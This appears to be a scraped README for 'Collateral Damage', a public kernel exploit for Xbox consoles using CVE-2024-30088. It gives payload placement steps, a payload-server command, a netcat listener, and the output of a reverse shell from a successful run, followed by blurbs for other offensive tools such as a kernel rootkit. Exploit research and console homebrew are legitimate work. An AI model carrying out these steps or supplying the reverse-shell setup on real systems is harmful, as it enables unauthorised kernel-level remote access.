Collateral Damage is a kernel exploit for Xbox SystemOS using CVE-2024-30088. It targets Xbox One and Xbox Series consoles running kernel versions 25398.4478, 25398.4908, and 25398.4909.
The initial entrypoint is via the Game Script UWP application.
The first stage payloads, PE loader and network loader are provided by Solstice.
This exploit was developed by Emma Kirkpatrick (vulnerability discovery & exploitation) and Lander Brandt (Solstice)
To place the payload locally on the Xbox console a full-trust explorer like Adv File Explorer (FullTrust) is recommended.
Alternatively, the initial payload can be served via a USB keyboard simulator (rubber ducky etc.) and further payload stages can then be loaded over the network.
The reverse shell example provided here requires that your console is connected to a network. When connecting your console to a network be very careful to avoid connecting to the internet and updating.
Try to block connectivity to Xbox LIVE as much as possible, at the very least by setting your DNS to invalid servers.
This exploit is not fully reliable. It relies on a CPU side channel as well as a race condition, both of which have the potential to fail.
In the event of a failure, the exploit may alert you that it has failed via network output, or the console itself may crash and reboot.
gamescript_autosave_network.txt
or gamescript_autosave.txt
to contain the local IP of your PC. gamescript_autosave.txt
, stage2.bin
, and run.exe
to the LocalState
directory of the Game Script application on your Console (Q:\Users\UserMgr0\AppData\Local\Packages\27878ConstantineTarasenko.458004FD2C47C_c8b3w9r5va522\LocalState\
)gamescript_autosave_network.txt
into the GameScript window. Serve stage2.bin
and run.exe
via payload_server_win_x64.exe --stage2 stage2.bin --run run.exe
nc64.exe -lvnp 7070
)listening on [any] 7070 ...
connect to [192.168.0.61] from (UNKNOWN) [192.168.0.130] 49665
Collateral Damage - @carrot_c4k3 & @landaire (exploits.forsale)
Build number: 25398.4478
Attempting to find kernel base...
Found likely kernel base: FFFFF80AF9800000
Attempting exploit...
Exploit succeeded! Running payload!
Microsoft Windows [Version 10.0.25398.4478]
Copyright (c) Microsoft Corporation. All rights reserved.
S:\>
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…
Embark on the journey of becoming a certified Red Team professional with our definitive guide.…
This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…
This took me like 4 days (+2 days for an update), but I got it…
MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…